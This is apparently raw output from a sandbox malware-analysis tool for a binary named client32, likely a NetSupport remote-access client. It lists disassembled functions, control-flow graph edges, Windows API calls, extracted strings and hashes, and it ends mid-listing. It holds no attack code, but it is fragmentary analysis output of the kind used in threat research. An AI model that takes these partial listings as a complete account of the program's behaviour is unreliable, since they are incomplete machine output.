                                                                                • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1B702977,?,?,00000000), ref: 1112909A
                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                  • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$878411$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                • API String ID: 372548862-2697319139
                                                                                • Opcode ID: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                                • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                • Opcode Fuzzy Hash: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                                • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56
                                                                                Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1052 1102e0d0-1102e120 call 111101b0 1055 1102e122-1102e136 call 11143630 1052->1055 1056 1102e138 1052->1056 1058 1102e13e-1102e183 call 11142e60 call 11143690 1055->1058 1056->1058 1064 1102e323-1102e332 call 11145990 1058->1064 1065 1102e189 1058->1065 1074 1102e338-1102e348 1064->1074 1066 1102e190-1102e193 1065->1066 1068 1102e195-1102e197 1066->1068 1069 1102e1b8-1102e1c1 1066->1069 1071 1102e1a0-1102e1b1 1068->1071 1072 1102e1c7-1102e1ce 1069->1072 1073 1102e2f4-1102e30d call 11143690 1069->1073 1071->1071 1075 1102e1b3 1071->1075 1072->1073 1077 1102e2c3-1102e2d8 call 11163ca7 1072->1077 1078 1102e1d5-1102e1d7 1072->1078 1079 1102e2da-1102e2ef call 11163ca7 1072->1079 1080 1102e26a-1102e29d call 11162777 call 11142e60 1072->1080 1081 1102e2ab-1102e2c1 _strncpy 1072->1081 1082 1102e25b-1102e265 1072->1082 1083 1102e29f-1102e2a9 1072->1083 1084 1102e21c-1102e222 1072->1084 1085 1102e24c-1102e256 1072->1085 1073->1066 1099 1102e313-1102e315 1073->1099 1086 1102e34a 1074->1086 1087 1102e34f-1102e363 call 1102d360 1074->1087 1075->1073 1077->1073 1078->1073 1091 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1078->1091 1079->1073 1080->1073 1081->1073 1082->1073 1083->1073 1093 1102e224-1102e238 call 11163ca7 1084->1093 1094 1102e23d-1102e247 1084->1094 1085->1073 1086->1087 1097 1102e368-1102e36d 1087->1097 1091->1073 1093->1073 1094->1073 1104 1102e413-1102e42d call 11146fe0 1097->1104 1105 1102e373-1102e398 call 110b7df0 call 11147060 1097->1105 1099->1104 1107 1102e31b-1102e321 1099->1107 1119 1102e483-1102e48f call 1102bc40 1104->1119 1120 1102e42f-1102e448 call 1105e820 1104->1120 1125 1102e3a3-1102e3a9 1105->1125 1126 1102e39a-1102e3a1 1105->1126 1107->1064 1107->1074 1130 1102e491-1102e498 1119->1130 1131 1102e468-1102e46f 1119->1131 1120->1119 1129 1102e44a-1102e45c 1120->1129 1132 1102e3ab-1102e3b2 call 11028360 1125->1132 1133 1102e409 1125->1133 1126->1104 1129->1119 1145 1102e45e 1129->1145 1134 1102e475-1102e478 1130->1134 1136 1102e49a-1102e4a4 1130->1136 1131->1134 1135 1102e67a-1102e69b GetComputerNameA 1131->1135 1132->1133 1144 1102e3b4-1102e3e6 1132->1144 1133->1104 1139 1102e47a-1102e481 call 110b7df0 1134->1139 1140 1102e4a9 1134->1140 1141 1102e6d3-1102e6d9 1135->1141 1142 1102e69d-1102e6d1 call 11028230 1135->1142 1136->1135 1147 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1139->1147 1140->1147 1148 1102e6db-1102e6e0 1141->1148 1149 1102e70f-1102e722 _strncpy 1141->1149 1142->1141 1171 1102e727-1102e733 1142->1171 1162 1102e3f0-1102e3ff call 110f64d0 1144->1162 1163 1102e3e8-1102e3ee 1144->1163 1145->1131 1201 1102e64a-1102e652 SetLastError 1147->1201 1202 1102e58c-1102e5a3 1147->1202 1154 1102e6e6-1102e6ea 1148->1154 1150 1102e917-1102e93a 1149->1150 1172 1102e962-1102e96a 1150->1172 1173 1102e93c-1102e942 1150->1173 1155 1102e706-1102e708 1154->1155 1156 1102e6ec-1102e6ee 1154->1156 1165 1102e70b-1102e70d 1155->1165 1160 1102e702-1102e704 1156->1160 1161 1102e6f0-1102e6f6 1156->1161 1160->1165 1161->1155 1168 1102e6f8-1102e700 1161->1168 1169 1102e402-1102e404 call 1102d900 1162->1169 1163->1162 1163->1169 1165->1149 1165->1171 1168->1154 1168->1160 1169->1133 1178 1102e735-1102e74a call 110b7df0 call 1102a1f0 1171->1178 1179 1102e74c-1102e75f call 11081d30 1171->1179 1180 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1172->1180 1181 1102e96c-1102e979 call 11036710 call 11162777 1172->1181 1173->1172 1177 1102e944-1102e95d call 1102d900 1173->1177 1177->1172 1207 1102e7a3-1102e7bc call 11081d30 1178->1207 1196 1102e761-1102e784 1179->1196 1197 1102e786-1102e788 1179->1197 1181->1180 1196->1207 1206 1102e790-1102e7a1 1197->1206 1209 1102e613-1102e61f 1201->1209 1202->1209 1216 1102e5a5-1102e5ae 1202->1216 1206->1206 1206->1207 1226 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1207->1226 1227 1102e8fc-1102e909 _strncpy 1207->1227 1212 1102e662-1102e671 1209->1212 1213 1102e621-1102e62d 1209->1213 1212->1135 1217 1102e673-1102e674 FreeLibrary 1212->1217 1220 1102e63f-1102e643 1213->1220 1221 1102e62f-1102e63d GetProcAddress 1213->1221 1216->1209 1222 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1216->1222 1217->1135 1223 1102e654-1102e656 SetLastError 1220->1223 1224 1102e645-1102e648 1220->1224 1221->1220 1222->1209 1245 1102e5e8-1102e60e call 11147060 call 11027f80 1222->1245 1229 1102e65c 1223->1229 1224->1229 1258 1102e853-1102e869 call 11129e00 1226->1258 1259 1102e83f-1102e84e call 11029a70 1226->1259 1232 1102e90c-1102e911 CharUpperA 1227->1232 1229->1212 1232->1150 1245->1209 1263 1102e882-1102e8bc call 110d0e20 * 2 1258->1263 1264 1102e86b-1102e87d call 110d0e20 1258->1264 1259->1258 1271 1102e8d2-1102e8fa _strncpy call 110d0a10 1263->1271 1272 1102e8be-1102e8cd call 11029a70 1263->1272 1264->1263 1271->1232 1272->1271
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc_memsetwsprintf
                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$878411$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                • API String ID: 3802068140-2860531889
                                                                                • Opcode ID: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                • Opcode Fuzzy Hash: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51
                                                                                Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1696 11144140-11144181 GetModuleFileNameA 1697 111441c3 1696->1697 1698 11144183-11144196 call 11081e00 1696->1698 1700 111441c9-111441cd 1697->1700 1698->1697 1704 11144198-111441c1 LoadLibraryA 1698->1704 1702 111441cf-111441dc LoadLibraryA 1700->1702 1703 111441e9-11144207 GetModuleHandleA GetProcAddress 1700->1703 1702->1703 1705 111441de-111441e6 LoadLibraryA 1702->1705 1706 11144217-11144240 GetProcAddress * 4 1703->1706 1707 11144209-11144215 1703->1707 1704->1700 1705->1703 1708 11144243-111442bb GetProcAddress * 10 call 11162bb7 1706->1708 1707->1708 1710 111442c0-111442c3 1708->1710
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,757323A0), ref: 11144173
                                                                                • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                • API String ID: 3874234733-2061581830
                                                                                • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                                Function 110AA170 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1711 110aa170-110aa1d2 LoadLibraryA GetProcAddress 1712 110aa1d8-110aa1e9 SetupDiGetClassDevsA 1711->1712 1713 110aa2e5-110aa2ed SetLastError 1711->1713 1714 110aa1ef-110aa1fd 1712->1714 1715 110aa3f3-110aa3f5 1712->1715 1718 110aa2f9-110aa2fb SetLastError 1713->1718 1719 110aa200-110aa204 1714->1719 1716 110aa3fe-110aa400 1715->1716 1717 110aa3f7-110aa3f8 FreeLibrary 1715->1717 1720 110aa417-110aa432 call 11162bb7 1716->1720 1717->1716 1721 110aa301-110aa30c GetLastError 1718->1721 1722 110aa21d-110aa235 1719->1722 1723 110aa206-110aa217 GetProcAddress 1719->1723 1724 110aa312-110aa31d call 11163aa5 1721->1724 1725 110aa3a0-110aa3b1 GetProcAddress 1721->1725 1722->1721 1732 110aa23b-110aa23d 1722->1732 1723->1718 1723->1722 1724->1719 1729 110aa3bb-110aa3bd SetLastError 1725->1729 1730 110aa3b3-110aa3b9 SetupDiDestroyDeviceInfoList 1725->1730 1734 110aa3c3-110aa3c5 1729->1734 1730->1734 1736 110aa248-110aa24a 1732->1736 1737 110aa23f-110aa245 call 11163aa5 1732->1737 1734->1715 1735 110aa3c7-110aa3e9 CreateFileA 1734->1735 1738 110aa3eb-110aa3f0 call 11163aa5 1735->1738 1739 110aa402-110aa40c call 11163aa5 1735->1739 1741 110aa24c-110aa25f GetProcAddress 1736->1741 1742 110aa265-110aa27b 1736->1742 1737->1736 1738->1715 1751 110aa40e-110aa40f FreeLibrary 1739->1751 1752 110aa415 1739->1752 1741->1742 1745 110aa322-110aa32a SetLastError 1741->1745 1750 110aa27d-110aa286 GetLastError 1742->1750 1753 110aa28c-110aa29f call 11163a11 1742->1753 1745->1750 1750->1753 1754 110aa361-110aa372 call 110aa110 1750->1754 1751->1752 1752->1720 1761 110aa382-110aa393 call 110aa110 1753->1761 1762 110aa2a5-110aa2ad 1753->1762 1759 110aa37b-110aa37d 1754->1759 1760 110aa374-110aa375 FreeLibrary 1754->1760 1759->1720 1760->1759 1761->1759 1769 110aa395-110aa39e FreeLibrary 1761->1769 1764 110aa2af-110aa2c2 GetProcAddress 1762->1764 1765 110aa2c4-110aa2db 1762->1765 1764->1765 1766 110aa32f-110aa331 SetLastError 1764->1766 1770 110aa337-110aa351 call 110aa110 call 11163aa5 1765->1770 1771 110aa2dd-110aa2e0 1765->1771 1766->1770 1769->1720 1770->1759 1776 110aa353-110aa35c FreeLibrary 1770->1776 1771->1719 1776->1720
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(setupapi.dll,1B702977,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                                • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                                • _free.LIBCMT ref: 110AA240
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                                • GetLastError.KERNEL32 ref: 110AA27D
                                                                                • _malloc.LIBCMT ref: 110AA293
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                                • GetLastError.KERNEL32 ref: 110AA301
                                                                                • _free.LIBCMT ref: 110AA313
                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                                • _free.LIBCMT ref: 110AA344
                                                                                • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                • API String ID: 3464732724-3340099623
                                                                                • Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                                • Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50
                                                                                Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2049 1102e199 2050 1102e1a0-1102e1b1 2049->2050 2050->2050 2051 1102e1b3 2050->2051 2052 1102e2f4-1102e30d call 11143690 2051->2052 2055 1102e313-1102e315 2052->2055 2056 1102e190-1102e193 2052->2056 2057 1102e413-1102e42d call 11146fe0 2055->2057 2058 1102e31b-1102e321 2055->2058 2059 1102e195-1102e197 2056->2059 2060 1102e1b8-1102e1c1 2056->2060 2081 1102e483-1102e48f call 1102bc40 2057->2081 2082 1102e42f-1102e448 call 1105e820 2057->2082 2062 1102e323-1102e332 call 11145990 2058->2062 2063 1102e338-1102e348 2058->2063 2059->2050 2060->2052 2064 1102e1c7-1102e1ce 2060->2064 2062->2063 2067 1102e34a 2063->2067 2068 1102e34f-1102e36d call 1102d360 2063->2068 2064->2052 2069 1102e2c3-1102e2d8 call 11163ca7 2064->2069 2070 1102e1d5-1102e1d7 2064->2070 2071 1102e2da-1102e2ef call 11163ca7 2064->2071 2072 1102e26a-1102e29d call 11162777 call 11142e60 2064->2072 2073 1102e2ab-1102e2c1 _strncpy 2064->2073 2074 1102e25b-1102e265 2064->2074 2075 1102e29f-1102e2a9 2064->2075 2076 1102e21c-1102e222 2064->2076 2077 1102e24c-1102e256 2064->2077 2067->2068 2068->2057 2097 1102e373-1102e398 call 110b7df0 call 11147060 2068->2097 2069->2052 2070->2052 2083 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2070->2083 2071->2052 2072->2052 2073->2052 2074->2052 2075->2052 2084 1102e224-1102e238 call 11163ca7 2076->2084 2085 1102e23d-1102e247 2076->2085 2077->2052 2105 1102e491-1102e498 2081->2105 2106 1102e468-1102e46f 2081->2106 2082->2081 2107 1102e44a-1102e45c 2082->2107 2083->2052 2084->2052 2085->2052 2130 1102e3a3-1102e3a9 2097->2130 2131 1102e39a-1102e3a1 2097->2131 2110 1102e475-1102e478 2105->2110 2112 1102e49a-1102e4a4 2105->2112 2106->2110 2111 1102e67a-1102e69b GetComputerNameA 2106->2111 2107->2081 2122 1102e45e 2107->2122 2116 1102e47a-1102e481 call 110b7df0 2110->2116 2117 1102e4a9 2110->2117 2119 1102e6d3-1102e6d9 2111->2119 2120 1102e69d-1102e6d1 call 11028230 2111->2120 2112->2111 2125 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2116->2125 2117->2125 2126 1102e6db-1102e6e0 2119->2126 2127 1102e70f-1102e722 _strncpy 2119->2127 2120->2119 2149 1102e727-1102e733 2120->2149 2122->2106 2182 1102e64a-1102e652 SetLastError 2125->2182 2183 